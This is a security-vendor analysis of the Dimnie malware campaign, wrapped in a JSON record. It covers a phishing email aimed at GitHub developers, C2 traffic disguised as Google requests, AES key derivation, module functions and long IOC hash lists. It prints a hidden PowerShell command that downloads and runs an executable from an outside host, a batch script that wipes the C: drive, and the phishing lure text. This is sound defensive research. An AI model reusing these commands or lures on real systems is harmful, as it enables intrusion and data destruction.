{
	"id": "b423c1a2-9797-4ba8-9ba7-e0fd7e23b762",
	"created_at": "2026-04-06T00:14:51.670676Z",
	"updated_at": "2026-04-10T03:21:12.463175Z",
	"deleted_at": null,
	"sha1_hash": "200ff5d67f1ef5daebe43a808410039c47fa3c51",
	"title": "Dimnie: Hiding in Plain Sight",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1100367,
	"plain_text": "Dimnie: Hiding in Plain Sight\r\nBy Brandon Levene, Dominik Reichel, Esmid Idrizovic\r\nPublished: 2017-03-28 · Archived: 2026-04-02 12:30:05 UTC\r\nA note to readers: The code samples included within this blog post may trigger alerts from your security software.\r\nPlease note that this does not indicate an infection or an attack; rather, it is a notification that the code could be\r\nmalicious if it were live.\r\nIntroduction\r\nIn mid-January of 2017 Unit 42 researchers became aware of reports of open-source developers receiving malicious\r\nemails. Multiple owners of Github repositories received phishing emails like the one below:\r\nHello,\r\nMy name is Adam Buchbinder, I saw your GitHub repo and i'm pretty amazed.\r\nThe point is that i have an open position in my company and looks like you\r\nare a good fit.\r\nPlease take a look into attachment to find details about company and job.\r\nDont hesitate to contact me directly via email highlighted in the document below.\r\nThanks and regards,\r\nAdam.\r\nThough there were multiple waves of messages following a similar tactic, each one carried the same malicious .doc file\r\nas an attachment (SHA256: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e). This file\r\ncontained embedded macro code that executed a commonly observed PowerShell command to download and execute a\r\nfile.\r\nFigure 1. 
The attackers used a common technique to try to avoid static detection by introducing characters which the\r\nWindows shell will ignore but static engines will typically see as part of the string.\r\nA more readable version of the PowerShell code is shown below:\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 1 of 40\n\ncmd.exe /c \"powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'\"\r\nOn initial inspection, everything appears to follow the same formula as many “traditional” malware campaigns: e-mail\r\nlure, malicious attachment, macro, PowerShell downloader, and finally a binary payload (SHA256:\r\n3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22). Examining the payload’s communications\r\ncaused us to raise our eyebrows.\r\nDimnie, the commonly agreed-upon name for the binary dropped by the PowerShell script above, has been around for\r\nseveral years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control\r\nmechanisms. The malware family serves as a downloader and has a modular design encompassing various\r\ninformation-stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating\r\nanalysis. During its lifespan, it appears to have undergone few changes, and its stealthy command and control methods,\r\ncombined with a previously Russian-focused target base, have allowed it to fly under the radar up until this most recent\r\ncampaign.\r\nHidden Requests\r\nLet us dive right in and have a look at a typical HTTP request from Dimnie to its command and control infrastructure.\r\nFigure 2. Initial HTTP GET request from the compromised client and the server's reply. 
The HTTP payload is truncated\r\nin this image.\r\nDoes this malware use a (now-defunct) Google service to aid its initial phone home? Not quite. On examination, the HTTP\r\nrequest appears to be an HTTP proxy request, as described by RFC 2616:\r\nThe absoluteURI form is REQUIRED when the request is being made to a proxy. The proxy is requested to\r\nforward the request or service it from a valid cache, and return the response. Note that the proxy MAY\r\nforward the request on to another proxy or directly to the server specified by the absoluteURI. In order to\r\navoid request loops, a proxy MUST be able to recognize all of its server names, including any aliases, local\r\nvariations, and the numeric IP address. An example Request-Line would be:\r\nGET http://www.w3.org/pub/WWW/TheProject.html HTTP/1.1\r\nTo allow for transition to absoluteURIs in all\r\nrequests in future versions of HTTP, all HTTP/1.1 servers MUST accept the absoluteURI form in requests,\r\neven though HTTP/1.1 clients will only generate them in requests to proxies.\r\nDimnie uses this feature to create a supposedly legitimate HTTP proxy request to a Google service. However, the Google\r\nPageRank service (toolbarqueries.google.com) has been slowly phased out since 2013 and as of 2016 is no longer open\r\nto the public. Therefore, the absolute URI in the HTTP request is for a non-existent service and the server is not acting as\r\na proxy. This seemingly RFC-compliant request is merely camouflage.\r\nWe know what it isn't, so we will dive deeper to figure out what is happening underneath the camouflage layer. Start by\r\nhaving a look at the DNS request that immediately preceded this HTTP GET request.\r\nFigure 3. 
DNS request issued prior to the HTTP request above.\r\nIt looks pretty normal, but we can see an authoritative nameserver returning an IP address, 176.9.81[.]4, which is\r\nhighlighted in the image below.\r\nFigure 4. Nameserver responds to a Type A query with a valid response.\r\nWhile it may not seem so at first glance, this DNS query is related to the initial GET request to Google. Below is the raw\r\nhex of the IP header of the HTTP request above:\r\nFigure 5. Raw Hex of the IP Header from the HTTP GET request for Dimnie's initial phone home.\r\nThe answer (176.9.81[.]4) from the initial DNS request for onechat[.]pw is used as the destination IP for the follow-up\r\nHTTP request that appears to connect to toolbarqueries.google.com. Sending the request to an entirely different server is\r\nnot complicated to achieve, but how many analysts would simply see a DNS request with no [apparent] related\r\nsubsequent traffic? That is precisely what Dimnie is relying upon to evade detections.\r\nWhat the GET?\r\nSince we have established the HTTP GET request to be largely falsified for camouflage purposes, we can now proceed\r\nto pick apart the initial outbound HTTP traffic. The HTTP GET request line is reproduced below:\r\nGET http://toolbarqueries.google.com/search?sourceid=navclient-ff\u0026features=Rank\u0026client=navclient-auto-ff\u0026ch=fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm\u0026q=info:google.com HTTP/1.1\r\nThis GET request contains a single piece of data used by the malware: the contents of the \"ch\" parameter, which is\r\nbase64 encoded.\r\nfYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm\r\nDecoding the \"ch\" parameter yields an AES key which Dimnie uses to decrypt payloads. 
The attacker uses AES 256 in\r\nECB mode to encrypt payloads which are pushed to a compromised host and decrypted.\r\nThe code below illustrates, in Python, the method we used to derive this key.\r\n\u003e\u003e\u003e import binascii\r\n\u003e\u003e\u003e import base64\r\n\u003e\u003e\u003e from Crypto.Cipher import AES\r\n\u003e\u003e\u003e a = \"fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm\"\r\n\u003e\u003e\u003e b = base64.b64decode(a)\r\n\u003e\u003e\u003e # decrypt the decoded \"ch\" value with an all-zero 256-bit key\r\n\u003e\u003e\u003e decryptor = AES.new('\\0' * 32, AES.MODE_ECB)\r\n\u003e\u003e\u003e c = decryptor.decrypt(b)\r\n\u003e\u003e\u003e binascii.hexlify(c)\r\n'cda59f1670cf48bf0000000011217350b14b3f2d4c6001006fb3b0fb00000000adf1de43000000000000000000000000'\r\n\u003e\u003e\u003e # the 4 bytes at offset 0x04, zero-padded to 32 bytes, form the payload key\r\n\u003e\u003e\u003e key = c[4:8] + ('\\0' * 28)\r\n\u003e\u003e\u003e binascii.hexlify(key)\r\n'70cf48bf00000000000000000000000000000000000000000000000000000000'\r\nBesides the HTTP payload, which is an AES 256 ECB encrypted PE file (after decrypting, SHA256:\r\n6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf), the server reply contains only one other\r\nHTTP header that seems to be used by the malware: the Cookie value sent back from the C2 server. 
This Cookie is a 48\r\nbyte, base64 encoded, AES 256 ECB encrypted series of UINT32 values pertaining to the payload (when requested) or\r\noutbound data (HTTP POSTs, see next section) as can be seen below (comments appended after //.)\r\nstruct DimnieInformation\r\n{\r\n    UINT32      dwUnknown1;     // 0x00:\r\n    UINT32      dwAesKey;       // 0x04: Final AES encryption key is: Key + (28 * '\\0')\r\n    UINT32      dwUnknown3;     // 0x08: Not used for encryption.\r\n    UINT32      dwUnknown4;     // 0x0C:\r\n    UINT32      dwUnknown5;     // 0x10: Can be subtracted with dwUnknown1 if higher than 0 but unknown use.\r\n    UINT32      dwUnknown6;     // 0x14:\r\n    UINT32      dwKey2;         // 0x18: Not used for encryption.\r\n    UINT32      dwFileSize;     // 0x1C: File size if file has been downloaded.\r\n    UINT32      dwUnknown9;     // 0x20: Can be subtracted with dwUnknown1 if higher than 0 but unknown use.\r\n    UINT32      dwType;         // 0x24: Type of sent/received data.\r\n    UINT32      dwCRC;          // 0x28: CRC of the received data.\r\n    UINT32      dwModuleID;     // 0x2C: Module ID of the downloaded module\r\n};\r\nHere is a list of possible types which may be found at offset 0x24:\r\nValue Description\r\n0x00000000 Main PE module received.\r\n0x00000001 16 byte information sent to C2, probably PING/PONG.\r\n0x00000002 PE Module received.\r\n0x000003a4 Get module.\r\n0x000003a6 Get main module.\r\n0x00002000 Running process.\r\n0x00003000 PC Information (Computer name, language, network card, …)\r\n0x00038000 Keylogger data\r\n0x00058000 Screenshots in PNG.\r\n0x00018000 Unknown.\r\n0x00098000 Unknown.\r\n0x00418000 Unknown.\r\n0x00118000 Unknown.\r\n0x00218000 Unknown.\r\n0x00818000 Unknown.\r\n0x02000000 Unknown.\r\nThe values contain a preset, defined size for the payload as well as an expected CRC32 value. 
Effectively, the Cookie\r\nparameter is used to verify the payload's integrity during the module downloader portion of the malware's lifecycle.\r\nWhen the Cookie value is included in later C2 traffic, it is primarily used to identify the type of data being sent back to\r\nthe server and the reporting module.\r\nMore Camouflage\r\nData exfiltration by the associated modules is performed using HTTP POST requests to another Google domain,\r\ngmail[.]com. However, just like the module downloader portion of the malware, these HTTP requests are hardcoded to\r\nbe sent to an attacker-controlled server. Again, Dimnie attempts to blend in by looking at least somewhat legitimate,\r\nalthough the data exfiltration traffic is far less convincing than that of the module downloads.\r\nFigure 6. HTTP POST request with encrypted data.\r\nOnce again, the data is appended to an image header and encrypted using AES 256 in ECB mode. The Cookie value\r\nfollows the same structure provided in the previous section. This initial push contains system information, as can be seen\r\nin the decrypted output below (data enclosed in brackets has been edited):\r\n[netbios name]\r\nWORKGROUP\r\n2\r\nHomeGroupUser$\r\n[Hostname]\r\n[Language]\r\n1\r\n10.0.2.15 (08-00-27-D9-83-51) 'Intel(R) PRO/1000 MT-Desktopadapter'\r\nPCI\\VEN_8086\u0026DEV_100E\u0026SUBSYS_001E8086\u0026REV_02\\3\u0026267A616A\u00260\u002618\r\n4\r\nAdministrator (0x10203)\r\n[Username] (0x10223)\r\nHomeGroupUser$ (0x10201)\r\n[Hostname] (0x10221)\r\nDuring our analysis, we identified follow-on POST requests containing screenshots of the compromised desktop and\r\nprocess activity lists which were encrypted and appended to a false JPEG header as described previously.\r\nFigure 7. 
Process activity list, post-decryption.\r\nDecoding the Traffic\r\nNow that we understand how Dimnie retrieves its modules and how it protects them, we can use the derived AES key to\r\ndecode the observed payloads from our PCAP data. The payloads themselves are never written to disk as they are\r\ndownloaded and subsequently injected directly into memory. The module ID is stored at offset 0x2C as a 32 byte value\r\nin the Cookie field; however, to calculate the \"true\" module ID we must use the following formula using the key found at\r\noffset 0x04 in the cookie: uModuleID = uID – uKey. Below is a table of observed module IDs, their functions, and type\r\nof information as referenced by the Cookie Header (at offset 0x24):\r\nModule ID Function Information Value\r\n0x20001 Main module: downloads other modules and injects them into memory. N/A\r\n0x20002 DLL module which exports SvcMain and is injected into another process. N/A\r\n0x20003 Contains 58 bytes in front of the DOS header. Purpose unknown. Appears to be a copy of the main module. N/A\r\n0x20004 Extracts PC information and sends it back to C2. 0x03000\r\n0x20005 Enumerates running processes and sends the list back to the C2. 0x2000\r\n0x20006 Module that can log keystrokes, take screenshots, interact with smartcards and more. Uses RegisterRawInputDevices/GetRawInputData for logging keys. 0x38000, 0x418000, 0x818000, 0x98000, 0x118000, 0x218000, 0x58000\r\n0x20007 Keylogger module which has two PE files appended. Both PE files contain the same functionality but are different architecture (x86 and x64). It sends back the logged keys and clipboard data to the C2. 0x38000\r\n0x20008 Module that can take screenshots and send them back to the C2. 0x58000\r\n0x20009 Self-destruct module which deletes all files on the C:\\ Drive. 
0x02000000\r\nThe self-destruct module, 0x20009, drops and executes the following batch script:\r\n@echo off\r\nTitle System need to reboot computer!\r\ncolor 0c\r\nEcho Auto Starting in 5 seconds\r\n@ping 127.0.0.1 -n 5 -w 1000 \u003e nul\r\n@ping 127.0.0.1 -n %1% -w 1000 \u003e nul\r\ncls\r\nColor 0e\r\nEcho delete disk C\r\ndel C:\\\\ /s /q\r\n@ping 127.0.0.1 -n 3 -w 1000 \u003e nul\r\n@ping 127.0.0.1 -n %1% -w 1000 \u003e nul\r\ncls\r\ncolor 0c\r\nEcho Remove directory\r\nRd C:\\\\ /s /q\r\n@ping 127.0.0.1 -n 3 -w 1000 \u003e nul\r\n@ping 127.0.0.1 -n %1% -w 1000 \u003e nul\r\ncls\r\nMsg * \\SYSTEM ERROR!HARDDRIVE IS OUT OF ORDER!\\;\r\nThe primary purpose of the modules we’ve observed is information stealing and reconnaissance. It should be\r\nnoted that Dimnie's modular framework allows for a variety of capabilities to be accessed by its operators; thus the\r\nmodules observed during the analyzed campaign may not encompass all available functionality.\r\nConclusion\r\nThe global reach of the January 2017 campaign which we analyzed in this post is a marked departure from previous\r\nDimnie targeting tactics. Multiple factors have contributed to Dimnie's relatively long-lived existence. By masking\r\nupload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders' assumptions\r\nabout what normal traffic looks like. 
This blending-in tactic, combined with a prior penchant for targeting systems used\r\nby Russian speakers, likely allowed Dimnie to remain relatively unknown.\r\nCustomers are protected by IPS, Dimnie is detected as malware by WildFire, and AutoFocus customers can see related\r\nsamples using the Dimnie tag.\r\nWe are also including IOCs for this malware family dating back to 2014 which include domains from DNS lookups\r\n(Appendix A) and dropper hashes (Appendix B). IOCs specifically mentioned in this post are included in the next\r\nsection.\r\nIOCs Mentioned in this Report\r\nWe’ve purposefully omitted legitimate domains and IPs from this listing.\r\nInitial Phishing Email: b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065\r\nMalicious .doc file: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e\r\nDimnie loader: 3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22\r\nSample decrypted main module: 6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf\r\nAppendix A: Associated SHA256 
Hashes\r\n
ks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 18 of 40\n\n5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387\r\nb39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5\r\nb86f42f252d586d032ee0e4022585c457f98f667bbe9f2f4ba4d53e6f34537fa\r\nb30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702\r\n7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f\r\n271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02\r\nf98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8\r\ncc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4\r\n0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8\r\n63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94\r\nb7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca\r\nd9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623\r\nca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9\r\nd23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f\r\ndd4d9ff987aaa9f2bdf526207a97d7182ef3be37fa08591a40e9bdcb8937c2d4\r\ne3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452\r\n00b3dcdeed117b8eaefff05246114c2ca49e88b3ccbac073c5cd87318e215f37\r\n34084bc57ca269c05ef65720bc39d8bd284000316242721982f4538af351852a\r\ndf4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47\r\n221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30\r\n0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710\r\n09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc\r\nef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba\r\n126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1\r\nf9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d\r\n5050de5d74798d634d7639ef9638da8f9be63158bbcf2bbfb50038a7ee1e53ed\r\n70871cb6d07a406f6b1748e5614e1ec33b879b159484a9f82354025a801cd1c3\r\n26a93a22a3080545ab09ee93a7385cc0a85d9a75df8d0d88310d8bc639530714\r\nhttp://researchcenter.paloa
ltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 19 of 40\n\nabd5cf43abd878e8d7633e19bc309de840ec4e12624cabd99ac6152d9455d44f\r\nb84328459e911de77827392db7967bb9ebefe90e365a8369ab8716a6b50aa5a2\r\ndfdb3b363d82d552b8b1a1de116f6e68c2a055170a5c83f43575ad3ae9b90ddb\r\ne5ef4e95831f24f345b4c00834b88b19098cada540da6aa60ba7ca861d20fd95\r\n8e04108c5e164c1f077f0abeac10fdf295207e1f160350d999527ce23f078385\r\n385b7126e4f3634ea1dda80d8bb4790e1b1a904d6232e51d0888ffd744b97dbf\r\n3b12c8915af0cea47a7126b4a7f1ae788972dfac366d5573ef2681ff3d13ad41\r\n05bb5e77bb934779bc7b6fff863bdc4f4db9759bf939c3cfff3ab0f75fcd13e7\r\ne7ee85ec5a7c228be03b201502a1e74186f36c7611917bacd9fc67501df3606c\r\n9f7e640951097f84b7ab42514ec2eae951b3c1b817c68efa9daae4345d2695b2\r\n88e075627d93bbf43eabd699ca9afac0cceaf43f18f8c7ac43f2a7f93a247b55\r\n06b8fa74196fa7edccb77a4bde000928a8ec15d56c5dd3c4af7237f876fc0991\r\nc6db6e329d73616e6869bbb4f86fbdcab88c948176253df82729a2010493b09a\r\n93867701be29f7154cf9f4bc72faad9e9859f4db3ed3030c04fcf03bab085b10\r\n7f4fc4475cf86628ac5277c363fbe0bf47e87e726e4247eabe788e4440bf5bff\r\nfd348ee3cc11647a87a7a065cc8dcc63cacad3349da567ce6cb5eb3f7d0a6ad1\r\nfb6aa05b6c9a6d394d33f2a6cdd4a9c626eaf784990b69aab15e6ebc51908739\r\n90aa424f52bd1f227ace86348c707ecc711c808526805915c50dfebf4bc49186\r\nb131f561551cfe16804cffa4ed1651576ddb9e880913d245c23c7756311e474c\r\n1d9ea027c8494e88148aa1b2d87bd13cf753902445423ac63257b89ccff1dd9e\r\n88aafb45bb4e7d68b5476b4673fd38f49c233d42475f7460afae37610004b54a\r\n40c4c891231a3932b5c15b42e1ff302f6fdf4776aab25a67f827333621795d9a\r\n3191b3988616e9e834c883348ab635727d3d1b7e964226ee9488c1e7a482ce3f\r\nf33d5ebb15bf924e590a2bea2c4cb914f1398b5694c2958b0c97c548327403ff\r\n3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22\r\n76c566798ffcede356a8ba95a56c0400d41c746ad1a0f8503b66c9ae3a9e28da\r\n09e39c3598fc68bd8193e47bad89723a8a989fc439cd717bc6cbdc596b144305\r\n6d97956e23d15262be7af32eceff949ee708904cf5dce9cb6f6d732c37fe0692\r\nhttp://researchcen
ter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 20 of 40\n\n5994178fd21ef4fbcea34a27890e24d56e5ebd247d26b4219f4d5475e4e00a9c\r\nb2484daed920e8065605675822eb3b0e66d947f024dbc8193f39988a6e37afd9\r\n4f7a58f1809fd0685ec815d0f5c910d39ef27ed2c4576339b3477a44aa756bad\r\n86debb3398b60748c2c1d0d88694c7308f2017c6737490e84fe688396a0c5aa4\r\nf2693ac1f73aa32dc4682ca66918e3ed78ed490cabc942018a6eca8c4aed9630\r\n810e765fc4b9f838ed619a777528b243573d79e93ab29d8e1e3071ea2619fe0f\r\n18241e18bdb290aa026d87c6d3dfa780d76347e8e966f3956bdfe44f36325473\r\nc88771c9a6adc3c8bd6bd2d173c82f0e1c1a5966cbb2f05c5471b978840c2223\r\n5f2e9aa038862b16ab09e6960262a25993e715df786a339bea352411e5e8ab12\r\nf0b5592de97e7e7193b76e073ee21b090884f503c85258ab0cc1d780ae4e41c4\r\nf22ed39d51c61cae0e03b2be39e05d1bfef05e55320aace141332a4a8ed3bd2c\r\nde77795f1344857af0b583e38939f1cbf789b0989b6c8dca4e8ea3a6f0e646a1\r\n60c2d4a1a5f757f5c9d3686bf85a5529e040049723ca3988e1f9560ea93a386d\r\n3c0f463ac70d2f2415fbdb0446ba0fad290fd93b3db9708ffc4a4bdca0b5d4f7\r\n9bb12887255696617d3e6356fe9f343473f6805db7dfabc6585a2ecd3289bff7\r\n2829d72b813345348681d402184d53ec74fa491a0f3c726aae6c39b901fac1e9\r\nd95990b7b03d017a64b8aa9f6133416176902d4195af9917660088245f4ebe7a\r\ne267f9233c885d662804197e153e69cb2f7704f14b5d082dce7fe3c2d581d4df\r\n6886aa1e2760b874a4950cac08e76259ff476a1976a0aeca4d392f60eefca6cc\r\n1773b425ac6c670cabfdfa300c0b0c2724bd0585b87218c3119af39c170d3074\r\n12558c50b9b61d080aac7b0890f1b95142316ae0d4e78dfb98672571543ecf6e\r\n05789b1487fa274943d967834ad530bc89d94aeed8c240f96d9922f05d6fb101\r\na797aff0ed250f1fffbc6a718796b63907a94ac21d6bb712a5e7786670a9d1fe\r\nf842607898e226fb480979112b0d67e3266ed7abf55f854851db0686ef5e4987\r\n5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf\r\n86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178\r\n1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c\r\n949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58\r\nhttp://re
searchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 21 of 40\n\n9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526\r\nde6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267\r\nc373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d\r\n2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271\r\n8ff4c76bc1bf9a10b17fdcfdd300b89df94be848ecb0af81f6aefba38ec5bfae\r\n102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26\r\n5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3\r\nf3e45f9e4dbd773b64cfe164de9e42f250f996b58b619fc2f0773be7965d235d\r\n6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b\r\nad91716f7148e6f1ecb70184139e32dcf8f5e521cd3f039f5a44d39d9c3ce09b\r\na8ba70be73578d901c5e2427fd2f63e06801dcba8726a82f1875d84ba147aaa3\r\n7647a422655510e1de02e3d43b176d5c26d1d621680db9a58c047c9bdb615402\r\n3b9b73d3b6e3337974e2bb2d1d49227fe5611354ebf294df56a514a8abfb413a\r\n1a32705bffda8774bf600c81d77a517e809ba9efd93a4fa8608ae9ee78968e3c\r\n413d664b5a7c3e6dbb1f39a971e09aee66e509846604f99ecfdb2be744ab8056\r\n780129565290dfbc00f9bd85c6c0c2a74c980d2baa3ce7f60c102441155d4b07\r\nbfff5e3879908b721c1c9c78cb8162dde2c557c7d8b2e191d75e702c437a4662\r\n3f6a79d68262bbd4401fb9e889ab93d863cde5f095f6bbf3da286f06e41fb39d\r\n215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a\r\n1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408\r\n69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886\r\n103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c\r\n78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175\r\nec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c\r\nd2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0\r\n66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294\r\nd9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71\r\n14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9\r\n
http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 22 of 40\n\n023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731\r\ncbb7c2fedc753f62fa1bf47f2e0c6aa487eecfd27d867789764dbde97a8b9449\r\n93369c703becbc0bb9960fb55b7d61ae733638e1e6eab10336faf8ce877925f6\r\nf3a1fb80a5c79d3735ddc4328b915a4b034526ae96345c9b2465c16582ab54be\r\n3e30805f1de04950d50d08176c8ac3c2974b42b30913c9aa11693d1a0e34b98a\r\n3cada2c960ec431d0f13edcbee4dcfef1dcbdce0538b511f110cbee2e6470722\r\ncec7a9270993443ed9cd798a3ac64693195805a410f56468518fa48cf5923876\r\n9003bfa0553e0e027105f822d08a82050854ecf6488db4d3c412d6996b1bf632\r\n5e139ca25b1519cc28a8096cb28d2be69f57b1af037674a81902f9c605777543\r\nf40f1dda30d5f959bc21b0049432c53bb06992c7c8fdd5e886a9b3a0fab06877\r\nb2a2d63c68fce4d4bfddd4fd8584b6c638ee26664785df436c48ffa16e177893\r\nfa91599afa18eff9735b0c0328c8cb0fc305f8d924ebb36a609e50e4a6ab256c\r\n0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4\r\n6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9\r\n0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a\r\n9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437\r\n28e888ec5247511d01df376f4be7e08c64841df37d9846580e87145c8efbbd10\r\n5693592ed69ca1cf0a5f8dcf8f548c063da287ce3e164a89df720a39a290feea\r\n1b6651a523be1c42f779877ad11f3b52130686aad4fd4ecdfbc15afbcea56aa2\r\n6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e\r\n46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b\r\n998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b\r\n4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0\r\n1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e\r\n0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685\r\n3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b\r\ndad5e918c4ce849f682485bd79e097ac097b554daa897b12151b4595d67980aa\r\n7b801c415f2fb9210c4d89e7d6332c1a812defe78b234d658b60f9337b8
f4266\r\nhttp://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/\r\nPage 23 of 40\n\n75285821f9997b304058e8bf76c7c3f9f4abcf47e0dffea73d6256f657b9e778\r\n210024ece45a6935da89ab7c5ae3293616679414e96e2157e49f9f607c831bdc\r\n97bbfb81f930d138ff47c3b899eee6917802385b8c8c1626a7679c5cab41c4a2\r\ncbc9e5552cda22130cd7a84cd4b3c68e95eb3f8c2e83dd77253bd1822d1f840d\r\nbf00cd1bc34ce457b0e4a99a8df5b7fda512496dc32f2762923254bc85261afb\r\n9de260dcfe2f5a852c0cff238ffc3fe3fc93feff008463af49f68c9f5b5ebc9b\r\ncadb1646563a317ac72579e8691c464bab439667811fb0d850bc2e950a3a332c\r\ndd3d708ba8ce177fd1f756ac5eb3347a0ec7cf65706438ea5bbdfe9125b0dbe4\r\n31df6ec1089e720c09e29f35ce33203359128c99cc0e4b03ec3e38237e8151ff\r\ne349394a043e11410ed3e7c35c70d85dbb9c5e512b593e51e1acde3b404414a2\r\ndddb5843c775ae47b37fd02c378699b4e250ac32739f30e0949bdaa28050a595\r\n42da6fd7f6ba8b90ffd1298d068045c7928cef6506642e69859e0b962b5864a8\r\ne6624eb4520d41516f64aa64a00ee224c8bf257403a12a9665d552348dad1bd5\r\n79ca3b8afac2ca896d7db2110789a187ad75810e2d92aa6f0378f73c1f72006f\r\nad08a0e1dace8d5a443a4bd21ec8d935e267f364ae1b152edaccb0b1f82870d7\r\nb87ada7c17cdb5b7c3cf1e6a0d35515c62112126f2f983c1190a6d9d1060b7db\r\n2ec204d0f35404c2548ac3dbc7b02e5db7ba28d4bc5c701986f0bfcee2a5fa5a\r\n77e1dfaeb73c4edf762f9503c428c1d92af6882b48305f5f5b070ec136575e43\r\n610d37dfb3089b516e4bced89de0c5161614d50ca511853f7be81138dfc4e844\r\n60ff74d053037b5ae70eeaf199a0acba35f58d275d12915ae8ed813dbf9a5b55\r\n376943f886b264824f6063e7dfc54a1a2d5071a3d44dec05208596079d6cf276\r\n89d4d851e6729a854fccb4d4f9277f9f545396714ff2b108d29c7ff418a501a3\r\n18db52a63720187b2afd57667e9ebdcb0a50a8e99909340281dcd07e266d761f\r\nbb05a0d905b915e2e84a8e69